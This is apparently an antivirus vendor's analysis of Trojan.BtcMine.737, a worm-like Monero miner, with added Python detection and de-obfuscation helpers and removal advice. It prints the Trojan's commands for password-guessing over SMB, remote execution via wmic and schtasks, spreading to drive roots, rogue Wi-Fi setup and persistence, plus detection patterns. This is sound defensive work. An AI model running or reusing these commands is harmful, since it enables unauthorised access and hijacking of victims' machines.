Trojan.BtcMine.737

Added to the Dr.Web virus database: 2015-07-20

Virus description added:

SHA1:

cc1e71c0e65280c9a32699e2850fafba19218fa0 (dropper)

edd53c0995a37618ffdb84557c8d737ae1ff5cc6 (worm)

f6ab05d457dab97767e5112ac4cc6e4998345afa (miner)

A Trojan designed to mine electronic currency. It consists of three installers nested inside one another, each created with the Nullsoft Scriptable Install System (NSIS).

The first installer is a simple dropper that tries to kill the following running processes belonging to the Trojan:

cmd /c taskkill /f /im file0.exe & tskill file0.exe
cmd /c taskkill /f /im CNminer.exe & tskill CNminer.exe
cmd /c taskkill /f /im minerd.exe & tskill minerd.exe
cmd /c taskkill /f /im cgminer.exe & tskill cgminer.exe
cmd /c taskkill /f /im key.exe & tskill key.exe

Then it copies itself to the hard drive of the compromised computer under the following path and runs the created copy:

%TEMP%\Key.exe

After that, the dropper attempts to delete the original file.

cmd /c for %i in (1,1,900) do del "<full path to the dropper>"

The second installer (key.exe) saves the executable with the CNminer.exe name to the following folder and then runs it:

%APPDATA%\NsCpuCNMiner\

Then it replicates itself to %APPDATA%\%USERNAME% by executing the following command:

cmd /c xcopy /y <own name> %COMMON_STARTUP% & xcopy /y /i <own name> %APPDATA%\%USERNAME%

and makes the folder accessible from the local network.

net share %USERNAME%="$APPDATA\%USERNAME%" /unlimited /cache:programs

After that, the second installer copies itself to the Documents folder:

"cmd" /c xcopy /y "$EXEPATH" "C:\Documents and Settings\All Users\Документы\" &
xcopy /y /i "$EXEPATH" "C:\Documents and Settings\All users\Documents\"

Then the Trojan replicates itself to root folders of all hard drives (this operation is repeated periodically) as follows:

cmd /c for %i in (A B C D E F G H J K L M N O P R S T Q U Y I X V X W Z)
do xcopy /y "%Temp%\key.exe" %i:\

These copies are disguised as WinRAR archives named Key.

Once launched, the Trojan enumerates the computers visible in its network places as follows:

"cmd" /c taskkill /f /im net.exe & tskill net.exe & net view

and then tries to connect to each of them using logins and passwords from a built-in list:

"cmd" /c taskkill /f /im net.exe & tskill net.exe & net use "\\NETCOMP-PC" "passwordpassword" /user:"NETCOMP" & net view "\\NETCOMP-PC" & net use "\\NETCOMP-PC" /delete /y
"cmd" /c taskkill /f /im net.exe & tskill net.exe & net use "\\NETCOMP-PC" "P@ssw0rd" /user:"NETCOMP" & net view "\\NETCOMP-PC" & net use "\\NETCOMP-PC" /delete /y
"cmd" /c taskkill /f /im net.exe & tskill net.exe & net use "\\NETCOMP-PC" "flvbybcnhfnjh" /user:"NETCOMP" & net view "\\NETCOMP-PC" & net use "\\NETCOMP-PC" /delete /y
...

Moreover, the malicious program tries to crack the password of the current Windows user account (the recovered password is what it supplies to the /RU and /RP parameters of the scheduled task below). If the attempt succeeds and the computer has the necessary wireless hardware, Trojan.BtcMine.737 sets up an open Wi-Fi access point as follows:

cmd /c taskkill /f /im schtasks.exe &
tskill schtasks.exe &
SchTasks /Create /TN WiFi /F /TR "cmd /c netsh wlan set hostednetwork mode=allow
ssid=FREE_WIFI_abc12345 key=abc12345 keyUsage=persistent && netsh wlan start hostednetwork &
net share %USERNAME%=C:\Users\%USERNAME%\AppData\Roaming\%USERNAME% /unlimited
/cache:programs" /RU "%USERNAME%" /RP "passwordpassword" /SC ONCE /ST 01:00:00 && SchTasks /Run /TN WiFi /i

If a connection to any computer on the network is established, the Trojan tries to copy itself to that computer and run the copy, either using Windows Management Instrumentation (WMI):

StrCpy $R7 "/node:"$R1" /user:$R2 /password:$R3"
Push "cmd" /c wmic $R7 process where name="$EXEFILE" | find /i "$EXEFILE" ||
(wmic $R7 process call create "C:$R5\$EXEFILE" & wmic $R7 process call create "$R6\$EXEFILE")

or using Task Scheduler as follows:

Push "cmd" /c schtasks /create /s "$R1" /u $R2 /p $R3 /ru system /tn "Key"
/tr "C:$R5\$EXEFILE" /sc onlogon /f

Once launched on the infected computer, CNminer.exe saves the miner's executable files (NsCpuCNMiner32.exe, NsCpuCNMiner64.exe, and pools.txt) to the folder it was started from. To make the executable run at startup, the Trojan adds a value to the Run key of the registry and creates a corresponding shortcut in the standard Startup folder as follows:

WriteRegStr HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "CNminer" "$APPDATA\NsCpuCNMiner\CNminer.exe"
CreateShortCut "$COMMON_STARTUP\CNminer.lnk" "$APPDATA\NsCpuCNMiner\CNminer.exe"
0 465 108462336

When the installer runs, its embedded script kills the following miner processes (if they are running):

cmd.exe /c taskkill /f /im minerd.exe & tskill minerd.exe
cmd.exe /c taskkill /f /im NsCpuCNMiner32.exe & tskill NsCpuCNMiner32.exe
cmd.exe /c taskkill /f /im NsCpuCNMiner64.exe & tskill NsCpuCNMiner64.exe
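The command lines quoted throughout this description (killing competing miners, the self-delete loop, copying to drive roots, sharing the %APPDATA% folder, the net use password guessing, the netsh hosted network, the wmic and schtasks remote execution, and the miner launch) are distinctive enough to match in process-creation telemetry. The following Python script is an added example, not Dr.Web's code and not part of the Trojan: it classifies command lines (assumed to come from a field such as the CommandLine value of Sysmon Event ID 1 or Windows Security event 4688) against narrow regular expressions built only from the fragments on this page, and runs them over a constructed sample log.

```python
"""Classify Windows process-creation command lines against the behaviours
described for Trojan.BtcMine.737 (added example, not Dr.Web's code).

Input is assumed to be one command line per log record. The SAMPLE_LOG below
is constructed for this example; only the command fragments are taken from
the description."""
import re
from typing import Dict, List

# Each rule is (tag, compiled regex). Patterns are kept narrow so that a
# match points at one specific behaviour from the write-up.
RULES = [
    ("kill-competing-miner",
     re.compile(r"taskkill\s+/f\s+/im\s+(?:minerd|cgminer|CNminer|NsCpuCNMiner(?:32|64)|key|file0)\.exe", re.I)),
    ("self-delete-loop",
     re.compile(r"for\s+%\w\s+in\s+\(1,1,\d+\)\s+do\s+del\b", re.I)),
    ("copy-to-drive-roots",
     re.compile(r"for\s+%\w\s+in\s+\((?:[A-Z]\s*){20,}\)\s*do\s+xcopy", re.I)),
    ("share-appdata-folder",
     re.compile(r"net\s+share\s+%USERNAME%=", re.I)),
    ("smb-password-guess",
     re.compile(r'taskkill\s+/f\s+/im\s+net\.exe.*?net\s+use\s+"\\\\[^"]+"\s+"[^"]*"\s+/user:', re.I | re.S)),
    ("rogue-hosted-wifi",
     re.compile(r"netsh\s+wlan\s+set\s+hostednetwork\s+mode=allow", re.I)),
    ("wmi-remote-exec",
     re.compile(r"wmic\s+/node:.*?process\s+call\s+create", re.I | re.S)),
    ("remote-schtask-onlogon",
     re.compile(r"schtasks\s+/create\s+/s\s+\S+.*?/sc\s+onlogon", re.I | re.S)),
    ("stratum-cpu-miner",
     re.compile(r"NsCpuCNMiner(?:32|64)\.exe.*?stratum\+tcp://", re.I | re.S)),
]


def classify(cmdline: str) -> List[str]:
    """Return the tags of every rule the command line matches, in rule order."""
    return [tag for tag, rx in RULES if rx.search(cmdline)]


def scan(lines: List[str]) -> Dict[str, List[str]]:
    """Map each matched tag to the command lines that triggered it."""
    hits: Dict[str, List[str]] = {}
    for line in lines:
        for tag in classify(line):
            hits.setdefault(tag, []).append(line.strip())
    return hits


def verdict(lines: List[str], threshold: int = 3) -> bool:
    """A single hit (e.g. taskkill on a miner) is weak evidence; several
    distinct behaviours on one host are a strong indication of this family."""
    return len(scan(lines)) >= threshold


# Constructed sample log: lines modelled on the fragments quoted in the
# description, followed by benign administrative commands that must not match.
SAMPLE_LOG = [
    'cmd /c taskkill /f /im CNminer.exe & tskill CNminer.exe',
    'cmd /c for %i in (1,1,900) do del "C:\\Users\\alice\\Downloads\\setup.exe"',
    'cmd /c for %i in (A B C D E F G H J K L M N O P R S T Q U Y I X V X W Z) do xcopy /y "%Temp%\\key.exe" %i:\\',
    'net share %USERNAME%="$APPDATA\\%USERNAME%" /unlimited /cache:programs',
    '"cmd" /c taskkill /f /im net.exe & tskill net.exe & net use "\\\\NETCOMP-PC" "P@ssw0rd" /user:"NETCOMP" & net view "\\\\NETCOMP-PC"',
    'netsh wlan set hostednetwork mode=allow ssid=FREE_WIFI_abc12345 key=abc12345 keyUsage=persistent',
    '"cmd" /c wmic /node:"NETCOMP-PC" /user:NETCOMP /password:P@ssw0rd process call create "C:\\Key.exe"',
    'schtasks /create /s "NETCOMP-PC" /u NETCOMP /p P@ssw0rd /ru system /tn "Key" /tr "C:\\Key.exe" /sc onlogon /f',
    '"C:\\Users\\alice\\AppData\\Roaming\\NsCpuCNMiner\\NsCpuCNMiner32.exe" -dbg -1 -o stratum+tcp://mine.moneropool.com:3333 -t 0 -u <wallet> -p x',
    'net use Z: \\\\fileserver\\share /persistent:yes',
    'taskkill /f /im notepad.exe',
    'schtasks /create /tn "Backup" /tr backup.bat /sc daily',
]

if __name__ == "__main__":
    for tag, matched in scan(SAMPLE_LOG).items():
        print(f"{tag}: {len(matched)} line(s)")
    print("host verdict:", "suspicious" if verdict(SAMPLE_LOG) else "clean")
```

The benign lines at the end of the sample show why the patterns are anchored on the Trojan's particular argument combinations (the preceding taskkill on net.exe, the /s and /sc onlogon pair, the hostednetwork mode=allow string) rather than on the tool names alone, which administrators use legitimately.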

Then the Trojan connects to the command and control server and receives additional configuration data in HTML format. The data contains pool settings and electronic wallet identifiers, which change constantly.

StrCpy $[38] "[,.:?&%=@!1234567890/qwertyuiopasdfghjklzxcvbnm "
StrCpy $[39] " mnbvcxzlkjhgfdsapoiuytrewq/0987654321!@=%&?:.,["
StrCpy $[33] "st******t.ru,178.**.***.223,pr******t.ru,te*****y.ru,p*****s.ru,qp****t.ru,pr*****s.ru"
StrCpy $[34] "stratum+tcp://mine.moneropool.com:8080 -t 0"
StrCpy $[35] "43qgfne1Bi2UUvffo815n3DfGmMW6ZRmagc2aCagW9wdY7QDvL1qCw1LD6FCro9kk42e86bxxRbbnSk3mUfaW2nCDbZgABp"
...
Push kernel32::GetTickCount()i.r2
StrCpy $[32] "http://$[32]/test.html?$2"
...
Push $[32]
Push /TOSTACK
Push Mozilla/5.0 Gecko/20100101 Firefox/4.0
Push /USERAGENT
RegisterDLL $PLUGINSDIR\inetc.dll get 0
Sleep 942
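The two StrCpy strings at the start of the fragment above are exact reverses of each other. The page shows the strings but not the code that uses them; the assumption made in this added example (which is not Dr.Web's code and not the Trojan's script) is that the installer applies them as a character-substitution table, mapping each character of the first string to the character at the same position in the second. Under that assumption the mapping is its own inverse, so the same routine both obfuscates and de-obfuscates, which is what an analyst would want to verify before using it on recovered strings.

```python
"""Analyst helper for the two character tables quoted from the installer
script (added example, not Dr.Web's code).

Assumption: the installer uses the tables as a character-substitution
alphabet. Both strings are copied verbatim from the description."""
from typing import Dict, Optional

TABLE_A = "[,.:?&%=@!1234567890/qwertyuiopasdfghjklzxcvbnm "
TABLE_B = " mnbvcxzlkjhgfdsapoiuytrewq/0987654321!@=%&?:.,["


def build_map(src: str = TABLE_A, dst: str = TABLE_B) -> Dict[str, str]:
    """Pair each character of src with the character at the same index in dst."""
    if len(src) != len(dst):
        raise ValueError("substitution tables must have equal length")
    if len(set(src)) != len(src):
        raise ValueError("source table contains duplicate characters")
    return {s: d for s, d in zip(src, dst)}


def is_involution(table: Dict[str, str]) -> bool:
    """True when applying the table twice returns every character to itself."""
    return all(table.get(v) == k for k, v in table.items())


def substitute(text: str, table: Optional[Dict[str, str]] = None) -> str:
    """Replace each character found in the table; characters outside the
    alphabet (e.g. '+', '-', upper-case letters) pass through unchanged."""
    if table is None:
        table = build_map()
    return "".join(table.get(ch, ch) for ch in text)


if __name__ == "__main__":
    table = build_map()
    print("second table is the first reversed:", TABLE_B == TABLE_A[::-1])
    print("mapping is self-inverse:", is_involution(table))
    # Constructed sample string; not data recovered from the Trojan.
    sample = "pool=stratum+tcp://example.invalid:3333 user=wallet"
    encoded = substitute(sample)
    print("encoded:", encoded)
    print("round trip ok:", substitute(encoded) == sample)
```

Because characters outside the 48-character alphabet are passed through untouched, upper-case letters and the '+' and '-' signs in a stratum URL or a miner option survive the transformation unchanged; that is worth remembering when looking for recognisable fragments in strings that have been through the table.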

After that, the miner itself is launched:

"C:\Users\<username>\AppData\Roaming\NsCpuCNMiner\NsCpuCNMiner32.exe" -dbg -1 -o stratum+tcp://mine.moneropool.com:3333 -t 0 -u 43tjagd2e8d4GXzYn5xmysYmDnLbvvZSHFPbMWtg4Cs1DLwztfENYbNBz8Y8fmuhpCXFHDzXUWn2QZwhswsNtgzTM8v899K -p x

Note that the mining component itself is a separate tool written by another developer; Dr.Web detects it on its own as a member of the Tool.BtcMine family.

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk, write it to a USB drive or burn it to a CD/DVD. After booting from this media, run a full scan and cure all the detected threats.

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.


  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a ransom, or some other announcement prevents you from using the device normally), do the following:
    • Boot your smartphone or tablet in safe mode (depending on the operating system version and the specifications of the particular device, this is done in various ways; consult the user guide shipped with the device, or contact its manufacturer);
    • Once safe mode is active, install Dr.Web for Android on the infected device and run a full system scan; follow the steps recommended for neutralizing the detected threats;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android